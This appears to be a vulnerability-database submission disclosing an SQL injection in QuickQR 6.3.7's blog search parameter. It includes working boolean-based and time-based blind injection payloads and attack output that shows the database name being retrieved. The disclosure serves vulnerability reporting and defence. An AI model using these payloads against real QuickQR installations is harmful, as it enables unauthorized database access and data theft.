Submit #179269: QuickQR 6.3.7 - SQL Injectioninfo

TitleQuickQR 6.3.7 - SQL Injection
Description# Exploit Title: QuickQR 6.3.7 - SQL Injection # Date: 07/07/2023 # Exploit Author: skalvin aka (CraCkEr) # Vendor: bylancer # Vendor Homepage: https://bylancer.com/ # Software Link: https://quickqr.by-code.com/ # Version: 6.3.7 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /blog https://website/blog?s=[SQLI] GET parameter 's' is vulnerable to SQL Injection --- Parameter: s (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: s=123') OR 05923=5923 OR ('04586'='4586 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z --- [+] Starting the Attack fetching current database current database: 'quickqrmenu_**' [-] Done
User
 skalvin (UID 49463)
Submission07/07/2023 20:35 (3 years ago)
Moderation07/15/2023 18:26 (8 days later)
StatusAccepted
VulDB entry234235 [Bylancer QuickQR 6.3.7 GET Parameter /blog s sql injection]
Points17

PreviousOverviewNext

Do you need the next level of professionalism?

Upgrade your account now!